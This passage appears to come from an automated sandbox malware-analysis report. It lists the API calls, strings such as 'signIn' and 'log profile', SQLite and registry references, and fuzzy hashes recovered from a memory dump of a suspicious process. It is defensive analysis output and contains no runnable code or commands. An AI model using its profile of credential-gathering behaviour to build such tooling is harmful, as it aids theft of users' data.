                                                  • memset.MSVCRT ref: 0040D8BD
                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                  • memset.MSVCRT ref: 0040D906
                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                  • String ID: sysdatetimepick32
                                                  • API String ID: 1028950076-4169760276
                                                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: -journal$-wal
                                                  • API String ID: 438689982-2894717839
                                                  • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                  • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Dialog$MessageSend
                                                  • String ID:
                                                  • API String ID: 3975816621-0
                                                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                  • String ID: .save$http://$https://$log profile$signIn
                                                  • API String ID: 1214746602-2708368587
                                                  • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                  • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                  • String ID:
                                                  • API String ID: 2313361498-0
                                                  • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                  • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageRectSend$Client
                                                  • String ID:
                                                  • API String ID: 2047574939-0
                                                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                  • String ID:
                                                  • API String ID: 4218492932-0
                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                  • memcpy.MSVCRT ref: 0044A8BF
                                                  • memcpy.MSVCRT ref: 0044A90C
                                                  • memcpy.MSVCRT ref: 0044A988
                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                  • memcpy.MSVCRT ref: 0044A9D8
                                                  • memcpy.MSVCRT ref: 0044AA19
                                                  • memcpy.MSVCRT ref: 0044AA4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: gj
                                                  • API String ID: 438689982-4203073231
                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                  • API String ID: 3510742995-2446657581
                                                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                  • memset.MSVCRT ref: 00405ABB
                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                  • SetFocus.USER32(?), ref: 00405B76
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$FocusItemmemset
                                                  • String ID:
                                                  • API String ID: 4281309102-0
                                                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfwcscat
                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                  • API String ID: 384018552-4153097237
                                                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 2029023288-3849865405
                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                  • memset.MSVCRT ref: 00405455
                                                  • memset.MSVCRT ref: 0040546C
                                                  • memset.MSVCRT ref: 00405483
                                                  • memcpy.MSVCRT ref: 00405498
                                                  • memcpy.MSVCRT ref: 004054AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$memcpy$ErrorLast
                                                  • String ID: 6$\
                                                  • API String ID: 404372293-1284684873
                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                  • wcscpy.MSVCRT ref: 0040A107
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                  • String ID:
                                                  • API String ID: 1331804452-0
                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                  • String ID: advapi32.dll
                                                  • API String ID: 2012295524-4050573280
                                                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                  • <%s>, xrefs: 004100A6
                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                  • API String ID: 3473751417-2880344631
                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset
                                                  • String ID: %2.2X
                                                  • API String ID: 2521778956-791839006
                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfwcscpy
                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                  • API String ID: 999028693-502967061
                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memsetstrlen
                                                  • String ID:
                                                  • API String ID: 2350177629-0
                                                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                  • API String ID: 2221118986-1606337402
                                                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                  • String ID:
                                                  • API String ID: 265355444-0
                                                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                    • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                  • memset.MSVCRT ref: 0040C439
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  • memset.MSVCRT ref: 0040C4D0
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                  • String ID:
                                                  • API String ID: 1973883786-0
                                                  • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                  • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004116FF
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                  Strings
                                                  Memory Dump Source
